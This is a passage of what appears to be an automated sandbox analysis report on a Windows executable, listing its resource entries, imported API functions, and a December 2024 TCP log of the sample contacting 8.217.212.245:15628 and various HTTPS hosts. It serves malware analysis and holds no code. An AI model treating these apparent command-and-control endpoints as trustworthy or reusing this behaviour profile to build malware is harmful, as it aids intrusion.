                                                                                                                                                                                                  RT_GROUP_CURSOR0x1fa08240x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                  RT_GROUP_CURSOR0x1fa08380x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                  RT_GROUP_CURSOR0x1fa084c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                  RT_GROUP_CURSOR0x1fa08600x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                  RT_GROUP_CURSOR0x1fa08740x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                  RT_GROUP_CURSOR0x1fa08880x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                  RT_GROUP_CURSOR0x1fa089c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                  RT_GROUP_CURSOR0x1fa08b00x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                  RT_GROUP_CURSOR0x1fa08c40x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                  RT_GROUP_CURSOR0x1fa08d80x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                  RT_GROUP_CURSOR0x1fa08ec0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                  RT_GROUP_CURSOR0x1fa09000x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                  RT_GROUP_CURSOR0x1fa09140x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                  RT_GROUP_CURSOR0x1fa09280x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                  RT_GROUP_ICON0x1fa093c0x14dataEnglishUnited States1.15
                                                                                                                                                                                                  RT_GROUP_ICON0x1fa09500x22dataEnglishUnited States1.0294117647058822
                                                                                                                                                                                                  RT_VERSION0x1fa09740xdcdataEnglishUnited States0.6590909090909091
                                                                                                                                                                                                  RT_MANIFEST0x1fa0a500x165ASCII text, with CRLF line terminatorsEnglishUnited States0.5434173669467787
                                                                                                                                                                                                  None0x1fa0bb80x64SysEx File - OctavePlateauEnglishUnited States0.79
                                                                                                                                                                                                  None0x1fa0c1c0x71dataEnglishUnited States0.45132743362831856
                                                                                                                                                                                                  None0x1fa0c900x40dataEnglishUnited States1.0625
                                                                                                                                                                                                  None0x1fa0cd00x2adataEnglishUnited States1.0952380952380953
                                                                                                                                                                                                  None0x1fa0cfc0x34dataEnglishUnited States1.0576923076923077

                                                                                                                                                                                                  Imports

                                                                                                                                                                                                  DLLImport
                                                                                                                                                                                                  KERNEL32.dllIsDebuggerPresent, RtlVirtualUnwind, RtlCaptureContext, GetACP, IsValidCodePage, EncodePointer, DecodePointer, FlsGetValue, FlsSetValue, FlsFree, FlsAlloc, GetStdHandle, HeapSetInformation, HeapCreate, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, SetUnhandledExceptionFilter, SetHandleCount, GetFileType, QueryPerformanceCounter, GetSystemTimeAsFileTime, InitializeCriticalSectionAndSpinCount, GetTimeZoneInformation, GetConsoleCP, GetConsoleMode, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, CompareStringW, SetEnvironmentVariableA, UnhandledExceptionFilter, TerminateProcess, HeapSize, HeapQueryInformation, ExitProcess, Sleep, RtlPcToFileHeader, RaiseException, RtlUnwindEx, RtlLookupFunctionEntry, GetStartupInfoA, GetCommandLineA, HeapReAlloc, HeapAlloc, HeapFree, GetFileSizeEx, LocalFileTimeToFileTime, GetFileAttributesExA, SetErrorMode, GetCurrentDirectoryA, FileTimeToLocalFileTime, GetOEMCP, GetCPInfo, TlsFree, DeleteCriticalSection, LocalReAlloc, TlsSetValue, GlobalHandle, GlobalReAlloc, TlsAlloc, InitializeCriticalSection, EnterCriticalSection, TlsGetValue, LeaveCriticalSection, LocalAlloc, GetModuleHandleW, SystemTimeToFileTime, FileTimeToSystemTime, GlobalFlags, GetDiskFreeSpaceA, GetFileTime, SetFileTime, GetShortPathNameA, GetFullPathNameA, GetVolumeInformationA, GetCurrentProcess, DuplicateHandle, GetFileSize, SetEndOfFile, UnlockFile, LockFile, FlushFileBuffers, SetFilePointer, lstrcmpiA, GetThreadLocale, GetStringTypeExA, GetCurrentThread, ConvertDefaultLocale, EnumResourceLanguagesA, GetLocaleInfoA, GetCurrentProcessId, lstrcmpA, GetPrivateProfileStringA, WritePrivateProfileStringA, GetPrivateProfileIntA, GetModuleFileNameW, GetProfileIntA, GetTickCount, GetCurrentThreadId, GlobalGetAtomNameA, GlobalAddAtomA, GlobalFindAtomA, GlobalDeleteAtom, CompareStringA, FreeLibrary, lstrcmpW, GetVersionExA, CopyFileA, GlobalSize, FormatMessageA, LocalFree, lstrlenW, MultiByteToWideChar, GlobalFree, FreeResource, GetModuleFileNameA, lstrcpynA, GlobalAlloc, MulDiv, GetProcAddress, GetModuleHandleA, LoadLibraryA, GetLastError, SetLastError, FindClose, MoveFileA, DeleteFileA, FindFirstFileA, WriteFile, GetTempFileNameA, lstrcatA, lstrcpyA, CloseHandle, ReadFile, CreateFileA, GetFileAttributesA, lstrlenA, GlobalUnlock, GlobalLock, FindResourceA, LoadResource, LockResource, SizeofResource, GetEnvironmentStringsW, WideCharToMultiByte
                                                                                                                                                                                                  USER32.dllCopyAcceleratorTableA, CreateMenu, PostThreadMessageA, GetTabbedTextExtentA, GetDCEx, LockWindowUpdate, DestroyIcon, SetWindowTextA, IsDialogMessageA, SetDlgItemTextA, RegisterWindowMessageA, LoadIconA, SendDlgItemMessageA, WinHelpA, IsChild, GetCapture, SetWindowsHookExA, CallNextHookEx, GetClassLongA, GetClassNameA, GetClassLongPtrA, SetPropA, GetPropA, RemovePropA, GetFocus, SetFocus, GetWindowTextLengthA, GetWindowTextA, GetForegroundWindow, GetLastActivePopup, DispatchMessageA, BeginDeferWindowPos, EndDeferWindowPos, GetTopWindow, GetWindowLongPtrA, SetWindowLongPtrA, UnhookWindowsHookEx, GetMessageTime, GetMessagePos, PeekMessageA, MapWindowPoints, ScrollWindow, TrackPopupMenu, SetMenu, SetScrollRange, GetScrollRange, SetScrollPos, GetScrollPos, SetForegroundWindow, ShowScrollBar, IsWindowVisible, PostMessageA, MessageBoxA, CreateWindowExA, GetClassInfoExA, GetClassInfoA, RegisterClassA, AdjustWindowRectEx, EqualRect, SetParent, SetScrollInfo, CopyRect, GetDlgCtrlID, PtInRect, DefWindowProcA, CallWindowProcA, GetMenu, SetWindowLongA, SetWindowPos, IntersectRect, SystemParametersInfoA, IsIconic, GetWindowPlacement, GetWindowRect, GetSystemMetrics, GetWindow, GetMenuState, GetMenuStringA, AppendMenuA, InsertMenuA, GetMenuItemID, GetMenuItemCount, GetSubMenu, RemoveMenu, GetDesktopWindow, GetActiveWindow, SetActiveWindow, CreateDialogIndirectParamA, DestroyWindow, GetWindowLongA, IsWindowEnabled, GetParent, GetNextDlgTabItem, EndDialog, ShowWindow, GetClipboardData, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, IsClipboardFormatAvailable, SetTimer, SetCapture, GetKeyState, TranslateAcceleratorA, LoadAcceleratorsA, KillTimer, ReleaseCapture, LoadCursorA, SetCursor, ScreenToClient, SendMessageA, EnableWindow, GetAsyncKeyState, GetSystemMenu, DeleteMenu, GetCursorPos, EnableScrollBar, GetDlgItem, ReleaseDC, GetDC, InvalidateRect, IsWindow, OffsetRect, GetSysColor, HideCaret, ShowCaret, SetCaretPos, CreateCaret, UpdateWindow, GetClientRect, SetWindowRgn, DrawIcon, UnregisterClassA, GetMenuItemInfoA, GetSysColorBrush, ShowOwnedPopups, CharUpperA, GetMessageA, TranslateMessage, ValidateRect, RegisterClipboardFormatA, GetScrollInfo, PostQuitMessage, WindowFromPoint, IsZoomed, TranslateMDISysAccel, DrawMenuBar, DefMDIChildProcA, DefFrameProcA, IsRectEmpty, SetCursorPos, RedrawWindow, EndPaint, BeginPaint, GetWindowDC, ClientToScreen, GrayStringA, DrawTextExA, DrawTextA, TabbedTextOutA, FillRect, DestroyCursor, SetRect, ReuseDDElParam, LoadMenuA, DestroyMenu, GetWindowThreadProcessId, InsertMenuItemA, CreatePopupMenu, SetRectEmpty, BringWindowToTop, InflateRect, SetMenuItemBitmaps, GetMenuCheckMarkDimensions, LoadBitmapA, ModifyMenuA, EnableMenuItem, DeferWindowPos, CheckMenuItem, UnpackDDElParam
                                                                                                                                                                                                  GDI32.dllDeleteDC, CreatePen, GetViewportOrgEx, Rectangle, PatBlt, GetStockObject, ExtTextOutA, CreateRectRgn, CreateRectRgnIndirect, SetRectRgn, CombineRgn, GetMapMode, DeleteObject, CreatePatternBrush, SaveDC, RestoreDC, SetBkMode, SetPolyFillMode, SetROP2, SetStretchBltMode, SetMapMode, ExcludeClipRect, IntersectClipRect, LineTo, MoveToEx, SetTextAlign, SelectClipRgn, GetViewportExtEx, GetWindowExtEx, GetPixel, PtVisible, RectVisible, TextOutA, Escape, EndDoc, SetViewportOrgEx, OffsetViewportOrgEx, SetViewportExtEx, ScaleViewportExtEx, SetWindowOrgEx, SetWindowExtEx, ScaleWindowExtEx, GetCurrentPositionEx, CreateSolidBrush, GetTextMetricsA, GetCharWidthA, CreateFontA, StretchDIBits, GetBkColor, CreateEllipticRgn, LPtoDP, Ellipse, GetNearestColor, GetBkMode, GetPolyFillMode, GetROP2, GetStretchBltMode, GetTextColor, GetTextAlign, GetTextFaceA, GetTextExtentPointA, GetWindowOrgEx, SetAbortProc, AbortDoc, EndPage, StartPage, StartDocA, DPtoLP, CreateBitmap, SetBkColor, SetTextColor, GetClipBox, CreateDCA, CopyMetaFileA, GetDeviceCaps, GetObjectA, SelectObject, CreateCompatibleDC, CreateFontIndirectA, BitBlt, CreateCompatibleBitmap, GetTextExtentPoint32A
                                                                                                                                                                                                  COMDLG32.dllGetFileTitleA
                                                                                                                                                                                                  WINSPOOL.DRVDocumentPropertiesA, OpenPrinterA, GetJobA, ClosePrinter
                                                                                                                                                                                                  ADVAPI32.dllGetFileSecurityA, SetFileSecurityA, RegOpenKeyA, RegEnumKeyA, RegDeleteKeyA, RegDeleteValueA, RegSetValueExA, RegQueryValueExA, RegCreateKeyExA, RegSetValueA, RegCloseKey, RegQueryValueA, RegOpenKeyExA, RegCreateKeyA
                                                                                                                                                                                                  SHELL32.dllExtractIconA, DragAcceptFiles, ShellExecuteA, DragFinish, DragQueryFileA, SHGetFileInfoA, SHGetSpecialFolderPathA
                                                                                                                                                                                                  SHLWAPI.dllPathFindFileNameA, PathStripToRootA, PathIsUNCA, PathFindExtensionA, PathRemoveFileSpecW
                                                                                                                                                                                                  oledlg.dll
                                                                                                                                                                                                  ole32.dllOleDestroyMenuDescriptor, OleCreateMenuDescriptor, OleTranslateAccelerator, CoInitializeEx, CoUninitialize, CreateStreamOnHGlobal, CoCreateInstance, OleInitialize, CoFreeUnusedLibraries, OleUninitialize, DoDragDrop, OleFlushClipboard, OleIsCurrentClipboard, OleGetClipboard, RevokeDragDrop, CoLockObjectExternal, RegisterDragDrop, OleDuplicateData, CoTaskMemAlloc, ReleaseStgMedium, CoTaskMemFree, CoRegisterMessageFilter, CoRevokeClassObject, IsAccelerator
                                                                                                                                                                                                  OLEAUT32.dllVariantClear, VariantChangeType, VariantInit, SysAllocStringLen
                                                                                                                                                                                                  OLEACC.dllLresultFromObject, CreateStdAccessibleObject

                                                                                                                                                                                                  Possible Origin

                                                                                                                                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                  EnglishUnited States

                                                                                                                                                                                                  Network Behavior

                                                                                                                                                                                                  Network Port Distribution

                                                                                                                                                                                                  TCP Packets

                                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                  Dec 29, 2024 16:29:17.140229940 CET4972515628192.168.2.58.217.212.245
                                                                                                                                                                                                  Dec 29, 2024 16:29:17.261077881 CET15628497258.217.212.245192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:29:17.261210918 CET4972515628192.168.2.58.217.212.245
                                                                                                                                                                                                  Dec 29, 2024 16:29:17.262418985 CET4972515628192.168.2.58.217.212.245
                                                                                                                                                                                                  Dec 29, 2024 16:29:17.383265018 CET15628497258.217.212.245192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:29:18.888113976 CET15628497258.217.212.245192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:29:18.934123993 CET4972515628192.168.2.58.217.212.245
                                                                                                                                                                                                  Dec 29, 2024 16:29:19.243766069 CET4972515628192.168.2.58.217.212.245
                                                                                                                                                                                                  Dec 29, 2024 16:29:19.364702940 CET15628497258.217.212.245192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:29:19.800348997 CET15628497258.217.212.245192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:29:19.857573032 CET4972515628192.168.2.58.217.212.245
                                                                                                                                                                                                  Dec 29, 2024 16:29:50.168876886 CET4972515628192.168.2.58.217.212.245
                                                                                                                                                                                                  Dec 29, 2024 16:29:50.289812088 CET15628497258.217.212.245192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:19.372349977 CET4986580192.168.2.518.136.139.158
                                                                                                                                                                                                  Dec 29, 2024 16:30:19.493674994 CET804986518.136.139.158192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:19.493777990 CET4986580192.168.2.518.136.139.158
                                                                                                                                                                                                  Dec 29, 2024 16:30:19.573679924 CET4986580192.168.2.518.136.139.158
                                                                                                                                                                                                  Dec 29, 2024 16:30:19.694655895 CET804986518.136.139.158192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:21.080887079 CET804986518.136.139.158192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:21.143744946 CET4986580192.168.2.518.136.139.158
                                                                                                                                                                                                  Dec 29, 2024 16:30:21.301785946 CET4972515628192.168.2.58.217.212.245
                                                                                                                                                                                                  Dec 29, 2024 16:30:21.422584057 CET15628497258.217.212.245192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:21.935425043 CET804986518.136.139.158192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.007287025 CET4986580192.168.2.518.136.139.158
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.102979898 CET4987353192.168.2.58.8.8.8
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.128926992 CET804986518.136.139.158192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.225708961 CET53498738.8.8.8192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.230262041 CET4987353192.168.2.58.8.8.8
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.257947922 CET4987353192.168.2.58.8.8.8
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.258806944 CET49875443192.168.2.5103.235.46.96
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.258862019 CET44349875103.235.46.96192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.258972883 CET49875443192.168.2.5103.235.46.96
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.265132904 CET49875443192.168.2.5103.235.46.96
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.265180111 CET44349875103.235.46.96192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.265467882 CET49875443192.168.2.5103.235.46.96
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.266104937 CET49876443192.168.2.5172.217.21.36
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.266139984 CET44349876172.217.21.36192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.266194105 CET49876443192.168.2.5172.217.21.36
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.267024040 CET49876443192.168.2.5172.217.21.36
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.267051935 CET44349876172.217.21.36192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.267158985 CET49876443192.168.2.5172.217.21.36
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.378892899 CET53498738.8.8.8192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.378958941 CET4987353192.168.2.58.8.8.8
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.447267056 CET49877443192.168.2.577.88.55.88
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.447294950 CET4434987777.88.55.88192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.447407961 CET49877443192.168.2.577.88.55.88
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.449040890 CET49877443192.168.2.577.88.55.88
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.449084997 CET4434987777.88.55.88192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.449155092 CET49877443192.168.2.577.88.55.88
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.572981119 CET804986518.136.139.158192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.573069096 CET4986580192.168.2.518.136.139.158
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.753237963 CET49878443192.168.2.58.223.59.119
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.753289938 CET443498788.223.59.119192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.753449917 CET49878443192.168.2.58.223.59.119
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.759655952 CET49878443192.168.2.58.223.59.119
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.759694099 CET443498788.223.59.119192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.937076092 CET49879443192.168.2.513.227.9.159
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.937102079 CET4434987913.227.9.159192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.937688112 CET49880443192.168.2.513.227.9.159
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.937716007 CET4434988013.227.9.159192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.937727928 CET49879443192.168.2.513.227.9.159
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.937777042 CET49880443192.168.2.513.227.9.159
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.938005924 CET49881443192.168.2.513.227.9.159
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.938023090 CET4434988113.227.9.159192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.939181089 CET49879443192.168.2.513.227.9.159
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.939193964 CET4434987913.227.9.159192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.939239025 CET49881443192.168.2.513.227.9.159
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.939270020 CET49880443192.168.2.513.227.9.159
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.939282894 CET4434988013.227.9.159192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.940715075 CET49881443192.168.2.513.227.9.159
                                                                                                                                                                                                  Dec 29, 2024 16:30:22.940735102 CET4434988113.227.9.159192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:24.794049025 CET4434988013.227.9.159192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:24.794140100 CET49880443192.168.2.513.227.9.159
                                                                                                                                                                                                  Dec 29, 2024 16:30:24.801450968 CET4434987913.227.9.159192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:24.801552057 CET49879443192.168.2.513.227.9.159
                                                                                                                                                                                                  Dec 29, 2024 16:30:24.867151976 CET49879443192.168.2.513.227.9.159
                                                                                                                                                                                                  Dec 29, 2024 16:30:24.867168903 CET4434987913.227.9.159192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:24.867306948 CET4434987913.227.9.159192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:24.868263960 CET49879443192.168.2.513.227.9.159
                                                                                                                                                                                                  Dec 29, 2024 16:30:24.868277073 CET4434987913.227.9.159192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:24.871861935 CET49880443192.168.2.513.227.9.159
                                                                                                                                                                                                  Dec 29, 2024 16:30:24.871887922 CET4434988013.227.9.159192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:24.871895075 CET49880443192.168.2.513.227.9.159
                                                                                                                                                                                                  Dec 29, 2024 16:30:24.871901035 CET4434988013.227.9.159192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:24.871972084 CET4434988013.227.9.159192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:24.951517105 CET49879443192.168.2.513.227.9.159
                                                                                                                                                                                                  Dec 29, 2024 16:30:24.971657991 CET4434988113.227.9.159192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:24.971787930 CET49881443192.168.2.513.227.9.159
                                                                                                                                                                                                  Dec 29, 2024 16:30:24.977844000 CET49881443192.168.2.513.227.9.159
                                                                                                                                                                                                  Dec 29, 2024 16:30:24.977854013 CET4434988113.227.9.159192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:24.977933884 CET4434988113.227.9.159192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:24.978195906 CET49881443192.168.2.513.227.9.159
                                                                                                                                                                                                  Dec 29, 2024 16:30:24.978212118 CET4434988113.227.9.159192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:25.063191891 CET49880443192.168.2.513.227.9.159
                                                                                                                                                                                                  Dec 29, 2024 16:30:25.063204050 CET4434988013.227.9.159192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:25.081782103 CET443498788.223.59.119192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:25.081923008 CET49878443192.168.2.58.223.59.119
                                                                                                                                                                                                  Dec 29, 2024 16:30:25.084753990 CET49878443192.168.2.58.223.59.119
                                                                                                                                                                                                  Dec 29, 2024 16:30:25.084765911 CET443498788.223.59.119192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:25.084964991 CET443498788.223.59.119192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:25.085035086 CET49878443192.168.2.58.223.59.119
                                                                                                                                                                                                  Dec 29, 2024 16:30:25.085916042 CET49887443192.168.2.523.98.101.155
                                                                                                                                                                                                  Dec 29, 2024 16:30:25.085938931 CET4434988723.98.101.155192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:25.086014986 CET49887443192.168.2.523.98.101.155
                                                                                                                                                                                                  Dec 29, 2024 16:30:25.086633921 CET49887443192.168.2.523.98.101.155
                                                                                                                                                                                                  Dec 29, 2024 16:30:25.086648941 CET4434988723.98.101.155192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:25.141535997 CET49881443192.168.2.513.227.9.159
                                                                                                                                                                                                  Dec 29, 2024 16:30:25.172447920 CET49880443192.168.2.513.227.9.159
                                                                                                                                                                                                  Dec 29, 2024 16:30:25.725729942 CET4434988013.227.9.159192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:25.725811005 CET4434988013.227.9.159192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:25.725886106 CET49880443192.168.2.513.227.9.159
                                                                                                                                                                                                  Dec 29, 2024 16:30:25.726362944 CET49880443192.168.2.513.227.9.159
                                                                                                                                                                                                  Dec 29, 2024 16:30:25.726378918 CET4434988013.227.9.159192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:25.726475954 CET49880443192.168.2.513.227.9.159
                                                                                                                                                                                                  Dec 29, 2024 16:30:25.726481915 CET4434988013.227.9.159192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:25.730695963 CET4434987913.227.9.159192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:25.730813026 CET4434987913.227.9.159192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:25.731070042 CET49879443192.168.2.513.227.9.159
                                                                                                                                                                                                  Dec 29, 2024 16:30:25.731147051 CET49879443192.168.2.513.227.9.159
                                                                                                                                                                                                  Dec 29, 2024 16:30:25.731158972 CET4434987913.227.9.159192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:25.731173992 CET49879443192.168.2.513.227.9.159
                                                                                                                                                                                                  Dec 29, 2024 16:30:25.731179953 CET4434987913.227.9.159192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:25.988178015 CET4434988113.227.9.159192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:25.988291025 CET4434988113.227.9.159192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:25.988998890 CET49881443192.168.2.513.227.9.159
                                                                                                                                                                                                  Dec 29, 2024 16:30:25.989316940 CET49881443192.168.2.513.227.9.159
                                                                                                                                                                                                  Dec 29, 2024 16:30:25.989327908 CET4434988113.227.9.159192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:25.989342928 CET49881443192.168.2.513.227.9.159
                                                                                                                                                                                                  Dec 29, 2024 16:30:25.989347935 CET4434988113.227.9.159192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:27.354551077 CET4434988723.98.101.155192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:27.354646921 CET49887443192.168.2.523.98.101.155
                                                                                                                                                                                                  Dec 29, 2024 16:30:27.355364084 CET4434988723.98.101.155192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:27.355413914 CET49887443192.168.2.523.98.101.155
                                                                                                                                                                                                  Dec 29, 2024 16:30:27.366703987 CET49887443192.168.2.523.98.101.155
                                                                                                                                                                                                  Dec 29, 2024 16:30:27.366714001 CET4434988723.98.101.155192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:27.366936922 CET4434988723.98.101.155192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:27.368374109 CET49887443192.168.2.523.98.101.155
                                                                                                                                                                                                  Dec 29, 2024 16:30:27.371220112 CET49893443192.168.2.5183.60.146.66
                                                                                                                                                                                                  Dec 29, 2024 16:30:27.371279955 CET44349893183.60.146.66192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:27.371370077 CET49893443192.168.2.5183.60.146.66
                                                                                                                                                                                                  Dec 29, 2024 16:30:27.379513979 CET49893443192.168.2.5183.60.146.66
                                                                                                                                                                                                  Dec 29, 2024 16:30:27.379542112 CET44349893183.60.146.66192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:28.075256109 CET4986580192.168.2.518.136.139.158
                                                                                                                                                                                                  Dec 29, 2024 16:30:28.196075916 CET804986518.136.139.158192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:29.675280094 CET44349893183.60.146.66192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:29.675381899 CET49893443192.168.2.5183.60.146.66
                                                                                                                                                                                                  Dec 29, 2024 16:30:29.695919037 CET49893443192.168.2.5183.60.146.66
                                                                                                                                                                                                  Dec 29, 2024 16:30:29.695944071 CET44349893183.60.146.66192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:29.696264029 CET44349893183.60.146.66192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:29.696324110 CET49893443192.168.2.5183.60.146.66
                                                                                                                                                                                                  Dec 29, 2024 16:30:29.696861982 CET49901443192.168.2.535.227.223.56
                                                                                                                                                                                                  Dec 29, 2024 16:30:29.696913004 CET4434990135.227.223.56192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:29.697046995 CET49901443192.168.2.535.227.223.56
                                                                                                                                                                                                  Dec 29, 2024 16:30:29.698337078 CET49901443192.168.2.535.227.223.56
                                                                                                                                                                                                  Dec 29, 2024 16:30:29.698352098 CET4434990135.227.223.56192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:31.720665932 CET4434990135.227.223.56192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:31.720786095 CET49901443192.168.2.535.227.223.56
                                                                                                                                                                                                  Dec 29, 2024 16:30:31.720813990 CET4434990135.227.223.56192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:31.721301079 CET49901443192.168.2.535.227.223.56
                                                                                                                                                                                                  Dec 29, 2024 16:30:31.722621918 CET49901443192.168.2.535.227.223.56
                                                                                                                                                                                                  Dec 29, 2024 16:30:31.722631931 CET4434990135.227.223.56192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:31.722863913 CET4434990135.227.223.56192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:31.722922087 CET49901443192.168.2.535.227.223.56
                                                                                                                                                                                                  Dec 29, 2024 16:30:31.723604918 CET49907443192.168.2.58.223.56.120
                                                                                                                                                                                                  Dec 29, 2024 16:30:31.723647118 CET443499078.223.56.120192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:31.723761082 CET49907443192.168.2.58.223.56.120
                                                                                                                                                                                                  Dec 29, 2024 16:30:31.724349022 CET49907443192.168.2.58.223.56.120
                                                                                                                                                                                                  Dec 29, 2024 16:30:31.724363089 CET443499078.223.56.120192.168.2.5
                                                                                                                                                                                                  Dec 29, 2024 16:30:33.929255962 CET443499078.223.56.120192.168.2.5
